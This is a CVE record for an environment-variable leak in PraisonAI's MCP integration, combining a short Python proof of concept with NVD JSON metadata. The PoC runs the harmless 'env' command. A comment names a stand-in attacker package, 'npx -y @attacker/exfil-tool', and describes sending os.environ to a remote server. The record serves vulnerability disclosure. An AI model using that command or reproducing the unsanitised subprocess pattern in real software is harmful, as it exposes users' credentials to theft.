CVE-2026-40159

import subprocess import os # Proof of Concept: Demonstrating environment variable leakage # This simulates how the vulnerable application spawns a process. # In a real scenario, an attacker controls 'user_command' (e.g., via MCP) # Example: "npx -y @attacker/exfil-tool" user_command = "env" # Using 'env' to safely demonstrate that vars are visible print("[*] Simulating vulnerable subprocess execution...") # Vulnerable behavior: Passing the full environment dictionary (os.environ) # to the child process without sanitization. try: # This mimics the vulnerable code path in PraisonAI < 4.5.128 process = subprocess.Popen( user_command, shell=True, env=os.environ # Vulnerability: Leaking all parent env vars ) process.wait() except Exception as e: print(f"Error: {e}") # In an exploit, the command would be a malicious package that sends # process.env (in Node.js) or os.environ (in Python) to a remote server.

{"cve": {"id": "CVE-2026-40159", "sourceIdentifier": "[email protected]", "published": "2026-04-10T17:17:13.763", "lastModified": "2026-04-20T18:33:49.580", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "PraisonAI is a multi-agent teams system. Prior to 4.5.128, PraisonAI’s MCP (Model Context Protocol) integration allows spawning background servers via stdio using user-supplied command strings (e.g., MCP(\"npx -y @smithery/cli ...\")). These commands are executed through Python’s subprocess module. By default, the implementation forwards the entire parent process environment to the spawned subprocess. As a result, any MCP command executed in this manner inherits all environment variables from the host process, including sensitive data such as API keys, authentication tokens, and database credentials. This behavior introduces a security risk when untrusted or third-party commands are used. In common scenarios where MCP tools are invoked via package runners such as npx -y, arbitrary code from external or potentially compromised packages may execute with access to these inherited environment variables. This creates a risk of unintended credential exposure and enables potential supply chain attacks through silent exfiltration of secrets. This vulnerability is fixed in 4.5.128."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-200"}, {"lang": "en", "value": "CWE-214"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:praison:praisonai:*:*:*:*:*:*:*:*", "versionEndExcluding": "4.5.128", "matchCriteriaId": "56CDE5F5-B03C-4C3A-9A92-F61C9DFDA9B1"}]}]}], "references": [{"url": "https://github.com/MervinPraison/PraisonAI/security/advisories/GHSA-pj2r-f9mw-vrcq", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}